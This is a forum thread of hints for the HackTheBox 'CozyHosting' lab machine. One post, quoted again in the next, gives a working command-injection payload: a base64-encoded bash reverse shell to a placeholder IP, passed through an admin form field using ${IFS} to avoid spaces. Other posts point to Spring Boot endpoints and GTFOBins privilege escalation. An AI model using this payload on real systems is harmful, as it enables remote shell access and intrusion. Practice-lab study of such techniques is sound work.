HTB - CozyHosting
by soulmate - Sunday September 3, 2023 at 01:12 AM
#31
(Sep 04, 2023, 12:26 AM)shadow0exe13 Wrote: any hints after getting the admin panel
someone said what we should do further up in the thread, just scroll through ( i forgot what he said thats why i didnt say it in this message)
Reply
#32
(Sep 04, 2023, 12:26 AM)shadow0exe13 Wrote: any hints after getting the admin panel

play a little bit with the check ssh function on the admin, until you get some useful error
Reply
#33
Hope all are progressing.
Reply
#34
For those who are having trouble getting revshell.

You can use command substitution with ${IFS} instead of spaces.

And to carry out lateral movement, the website jar has everything you need. Download and decompiled

https://tldp.org/LDP/abs/html/commandsub.html
https://www.revshells.com/
Reply
#35
(Sep 03, 2023, 01:42 AM)itsnotme Wrote: For those who need help.

Foothold: Finding the technology of the site is just looking for the main errors in the configuration.
User: On the single post try to force an error and see the error message.
Root: GTFOBins

I am still lost
Reply
#36
(Sep 04, 2023, 01:54 AM)Bubbles Wrote:
(Sep 03, 2023, 01:42 AM)itsnotme Wrote: For those who need help.

Foothold: Finding the technology of the site is just looking for the main errors in the configuration.
User: On the single post try to force an error and see the error message.
Root: GTFOBins

I am still lost

You can DM me if you want to.
Reply
#37
(Sep 04, 2023, 01:30 AM)itsnotme Wrote: For those who are having trouble getting revshell.

You can use command substitution with ${IFS} instead of spaces.

And to carry out lateral movement, the website jar has everything you need. Download and decompiled

https://tldp.org/LDP/abs/html/commandsub.html
https://www.revshells.com/

can u tell me the payload ur using?
Reply
#38
(Sep 04, 2023, 02:14 AM)hexa11 Wrote:
(Sep 04, 2023, 01:30 AM)itsnotme Wrote: For those who are having trouble getting revshell.

You can use command substitution with ${IFS} instead of spaces.

And to carry out lateral movement, the website jar has everything you need. Download and decompiled

https://tldp.org/LDP/abs/html/commandsub.html
https://www.revshells.com/

can u tell me the payload ur using?

You can send the command like this:

Generate a base64 from the command "/bin/bash -i >& /dev/tcp/X.X.X.X/4444 0>&1"

And send this on the post
;$(echo${IFS}<BASE64>${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}/bin/bash${IFS})
Reply
#39
so I am stuck at the reverse shell. I get -e as invalid option. Any pointers?
Thank you

(Sep 04, 2023, 02:25 AM)itsnotme Wrote:
(Sep 04, 2023, 02:14 AM)hexa11 Wrote:
(Sep 04, 2023, 01:30 AM)itsnotme Wrote: For those who are having trouble getting revshell.

You can use command substitution with ${IFS} instead of spaces.

And to carry out lateral movement, the website jar has everything you need. Download and decompiled

https://tldp.org/LDP/abs/html/commandsub.html
https://www.revshells.com/

can u tell me the payload ur using?

You can send the command like this:

Generate a base64 from the command "/bin/bash -i >& /dev/tcp/X.X.X.X/4444 0>&1"

And send this on the post
;$(echo${IFS}<BASE64>${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}/bin/bash${IFS})

For some reason, I still get no whitespace allowed.

(Sep 04, 2023, 12:26 AM)shadow0exe13 Wrote: any hints after getting the admin panel

scroll down to connection settings. You will find two inputs. Hosname and username. Type something and send to repeater. Play around with the username field. Try to send commands and pay attention to the error in the response. It took me a while to get cause I was using a command that didnt have a very distinct output so I didnt notice the output in the error.
Reply
#40
(Sep 03, 2023, 09:16 AM)holyspirit Wrote:
(Sep 03, 2023, 04:42 AM)walker443 Wrote: any one tell me how to get user shell

You can begin by exploring the web and discovering a strange error: Whitelabel Error Page. By searching for this type of error, you will find that it is related to Spring Boot. This will lead you to discover additional endpoints that cannot be found through simple enumeration.

could you give more information about this please?
I found the error page is different. The one in cozyhosting doesn't display the path or input string.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] CPTS 12 FLAGS pulsebreaker 68 1,915 3 hours ago
Last Post: VictorPipeau
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 601 91,514 3 hours ago
Last Post: VictorPipeau
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 371 92,790 4 hours ago
Last Post: phannguyenbaouy1
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 21 2,604 8 hours ago
Last Post: popoler
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,246 Yesterday, 02:10 PM
Last Post: kkkato

Forum Jump:


 Users browsing this forum: 1 Guest(s)